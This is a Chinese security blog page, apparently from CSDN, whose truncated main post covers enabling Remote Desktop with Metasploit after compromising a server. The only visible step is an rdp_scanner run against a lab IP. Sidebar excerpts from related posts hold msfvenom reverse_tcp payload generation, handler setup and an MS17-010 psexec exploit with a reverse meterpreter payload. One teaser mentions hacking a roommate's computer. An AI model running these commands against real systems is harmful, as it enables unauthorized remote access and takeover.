【神兵利器】——187、MSF远程桌面

已于 2024-10-16 17:26:35 修改
阅读量172 收藏
点赞数
分类专栏: 【WEB渗透】 文章标签: 漏洞复现 渗透测试 信息安全 网络安全 MSF
于 2024-10-16 17:26:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fly_hps/article/details/142987256
版权
文章前言

在渗透测试中如果我们获取到了目标服务器的权限,此时我们可以考虑查看当前服务器是否有开启远程桌面,如果有开启远程桌面则可以通过图形化界面的方式进行远程操作,更加便捷,更加迅速,如果没有开启远程桌面,那么我们可以通过获取到的shell来执行命令开启远程桌面,随后进行利用

开启服务

Step 1:服务状态检测

msf6 exploit(multi/handler) > search rdp_
msf6 exploit(multi/handler) > use 0
msf6 auxiliary(scanner/rdp/rdp_scanner) > set RHOSTS 192.168.204.151
msf6 auxiliary(scanner/rdp/rdp_scanner) > exploit

关闭状态扫描结果如下所示:

开启状态扫描结果如下所示:

了解本专栏 订阅专栏 解锁全文
神兵利器】——191、MSF终端乱码
Fly_鹏程万里
10-17 269
我们在使用MSF对目标系统实施攻击后获取到一个Meterpreter之后转shell时经常会遇到中文乱码的情况,导致我们在cmd中执行命令后回显的结果没法友好的展示,而造成这类问题的根本原因在于编码不一致导致的,本篇文章主要介绍如何解决此类问题。
神兵利器】——192、MSF终端乱码
最新发布
Fly_鹏程万里
10-17 129
Metasploit Framework(MSF)提供了多种权限维持(Persistence)模块和技术,用于在已经获得对目标系统访问权限的情况下保持持久性以确保持续访问,本篇文章主要介绍一些MSF框架中的权限维持的方法并结合一些具体的操作来介绍权限维持的操作手法。
msf拿下windows的远程桌面
mulincong的博客
05-25 977
msf拿下windows的远程桌面
今天简单黑一下室友电脑:MSF提权开启远程桌面并连接
kjuhfkicf154的博客
01-04 3660
今天简单黑一下室友电脑~
[ MSF使用实例 ] 利用远程桌面代码执行漏洞(MS12-020)漏洞导致windows靶机蓝屏
qq_51577576的博客
08-27 1580
Metasploit是一个免费的、可下载的框架, 通过它可以很容易地 获取、开发并对计算机软件漏洞实施攻击。它本身 附带数百个 已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。后续会有专门的文章介绍MSF,这里只是一个实例,就不多讲了。...
记一次完整体系的攻防演练的环境部署-映射公网-渗透getshell-上线frp-上线MSF实现内网远程渗透-打开远程桌面
随心所欲不逾矩
02-27 934
前言,本次笔记是记录在工作中的一个攻防演练环境搭建和通过部署的应用存在的文件上传漏洞getshell,接着上线frp,接着上线msf,实现msf远程渗透。准备工作:1,在客户的内网环境部署一个Windows7系统,在这个系统上把finecms这个应用部署上去。把finecms安装之后,和客户沟通,把这个应用的地址映射到公网上去。2,其次,没有条件的话,自己在在wmware上装个虚拟机部署上去也行。
使用MSFPC远程控制
y3174445239的博客
06-24 717
切换为root用户之后,可以对安卓机进行最大权限的控制,比如关闭selinux、读取文件等。按目标系统分:Windows、Androd、iOS、各种版本的Linux操作系统。Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。按连接方式分:正向、反向(注意:现在大都采用反向远程控制方式)5、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。(2)在安卓虚拟机中弹出提示信息,选择“允许”。
神兵利器】——190、MSF持续监听
Fly_鹏程万里
10-16 129
基本介绍。
神兵利器】——188、MSF获取凭据
Fly_鹏程万里
10-16 107
Metasploit Framework(简称MSF)是一个功能强大的开源渗透测试框架,广泛应用于网络安全领域,作为一款功能丰富且灵活的工具,MSF提供了多种模块和技术,用于发现漏洞、执行远程代码、获取凭据等操作以评估系统和网络的安全性。
MSF远程登录实验
坏坏-5的博客
04-13 3695
本篇是关于使用MSF工具远程控制桌面实验笔记!
开启目标远程桌面服务方法总结
Kevin's Blog
11-12 6075
文章目录一、目的二、CMD之远程桌面服务2.1 查看远程桌面是否开启2.2 确认远程端口号是否默认2.3 确认远程桌面服务状态2.4 WMIC开启/关闭远程桌面(推荐)2.5 更改远程桌面端口(附)三、MSF开启目标远程桌面3.1 在MSF shell中开启远程桌面(推荐)3.1.1 优 / 缺点3.1.2 启动远程桌面前 前期工作3.1.3 MSF shell中使用WMIC启动3.2 使用MSF enable_rdp模块3.2.1 优 / 缺点3.2.2 Meterpretr enable_rdp模块中启
内网MSF--从入门到熟练
qq_53003652的博客
12-25 1913
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。
Kali 玩机技巧(杂篇)
辉小鱼的博客
11-03 2241
本文是有关Kali Linux系统的一些简单低级的用法演示,是我个人听课笔记的总结,希望能解决大家的一些问题与困惑!该博文仅限技术学习与交流,若由此发生的一切攻击不法行为,皆与本人无关!
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
热门推荐
m0_65712192的博客
11-01 3万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
metasploit 远程连接服务器
cs_xiaoqiang的博客
01-23 2144
目标ip:192.168.0.101 本机ip:192.168.0.104 打开metasploit 找到到相应的模块,因为我也记不住这个模块,所以先搜索相关的在查找。 找到相应的模块 进入该模块 查看完整的配置信息 这里必要的配置,只有一个,那就是本机ip。因为要在服务器上运行,并连接本机ip。 运行,得到相应的代码。 在服务器的命令行下运行这段代码
msfconsole 控制台使用和操作
xianjie0318的博客
08-07 3万+
Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于...
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
weixin_62490257的博客
06-29 4145
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
Metasploit msfd插件实现远程访问msf
ropin_os的专栏
03-18 4183
linux下:        //进入msfd sudo msfd //打开连接 msfd -a -P //查看端口是否打开 netstat -tn //远程连接msf nc windows下://打开连接 msf> load msfd ServerName=你的IP地址 ServerPort=你的端口 //查看连接 netstat -na //访问使用telnet telnet   window下可能会出现乱码,这里推荐使用一款开源的软件 putty,附上简单的使用说
MSF使用总结
qq_44657899的博客
09-25 4912
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
msf打开win10电脑桌面
10-17
MSF(Metasploit Framework)是一个广泛使用的安全测试框架,主要用于渗透测试漏洞利用。如果你想通过MSF控制Windows 10电脑并访问其桌面,通常你需要进行以下几个步骤: 1. **设置Meterpreter回程连接**:首先,你需要在远程目标上安装 Meterpreter后门,这通常是通过exploit模块完成,比如利用一个已知的Windows漏洞。 ```shell msfconsole use exploit/windows/smb/ms17_010_psexec set payload windows/x64/meterpreter/reverse_https set LHOST=<你的服务器IP> set LPORT=<你的监听端口> run ``` 2. **获取Meterpreter session**:成功执行后,米特大师会尝试在目标机器上启动一个Meterpreter会话。如果一切顺利,你会看到类似 `Session [1] established` 的消息。 3. **命令行操作**:现在你可以使用Meterpreter的命令行界面(cmd.exe的增强版),输入 `shell` 或者 `run post/multi/handle` 来获得一个交互式命令行。然后输入 `control` 加上你想打开的程序名(如 "explorer" 或 "rundll32 user32.dll,ShellExec_RunDLL C:\Windows\System32\rundll32.exe shell32.dll,ShellExecuteEx http://<你的目标地址>")来打开桌面。 请注意,实际操作需要合法授权并且遵守相关法律法规,这通常用于教育和培训目的,而非未经授权的入侵行为。如果你在做渗透测试,请确保得到所有必要的许可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值